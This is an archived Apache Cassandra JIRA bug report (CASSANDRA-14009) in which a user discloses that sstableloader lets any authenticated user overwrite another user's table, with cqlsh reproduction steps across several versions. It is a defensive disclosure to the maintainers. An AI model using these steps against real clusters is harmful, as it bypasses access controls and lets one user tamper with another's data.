You are viewing a plain text version of this content. The canonical link for it is here.
Posted to commits@cassandra.apache.org by "Andrzej Bober (JIRA)" <ji...@apache.org> on 2017/11/13 10:27:00 UTC
[jira] [Created] (CASSANDRA-14009) Any user can overwrite any table
with sstableloader
Andrzej Bober created CASSANDRA-14009:
-----------------------------------------
Summary: Any user can overwrite any table with sstableloader
Key: CASSANDRA-14009
URL: https://issues.apache.org/jira/browse/CASSANDRA-14009
Project: Cassandra
Issue Type: Bug
Components: Auth
Reporter: Andrzej Bober
Fix For: 2.1.x, 2.2.x, 3.0.x, 3.11.x
Hi there,
Looks like any user can overwrite any table with sstableloader.
Tested ubuntu 16.04.3, Java 1.8.0_151_b12, and Cassandra 2.1.19 / 2.2.11 / 3.0.15 / 3.11.1.
{code:sql}
cassandra@cqlsh> CREATE USER alice WITH PASSWORD 'Alice';
cassandra@cqlsh> CREATE USER bob WITH PASSWORD 'Bob';
cassandra@cqlsh> CREATE KEYSPACE db4alice WITH replication = {'class': 'SimpleStrategy', 'replication_factor': 1};
cassandra@cqlsh> GRANT ALL PERMISSIONS ON KEYSPACE db4alice TO alice;
alice@cqlsh> CREATE TABLE users (userid text PRIMARY KEY, password text);
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user1', 'pass1');
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user2’, 'pass2’);
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user3’, 'pass3’);
alice@cqlsh> truncate users;
alice@cqlsh> select * from db4alice.users ;
userid | password
--------+----------
(0 rows)
sstableloader -d 127.0.0.1 -u bob -pw Bob ./db4alice/users
alice@cqlsh> select * from db4alice.users ;
userid | password
--------+----------
user2 | pass2
user1 | pass1
user3 | pass3
(3 rows)
{code}
Looks like a pretty serious bug to me.
--
This message was sent by Atlassian JIRA
(v6.4.14#64029)
---------------------------------------------------------------------
To unsubscribe, e-mail: commits-unsubscribe@cassandra.apache.org
For additional commands, e-mail: commits-help@cassandra.apache.org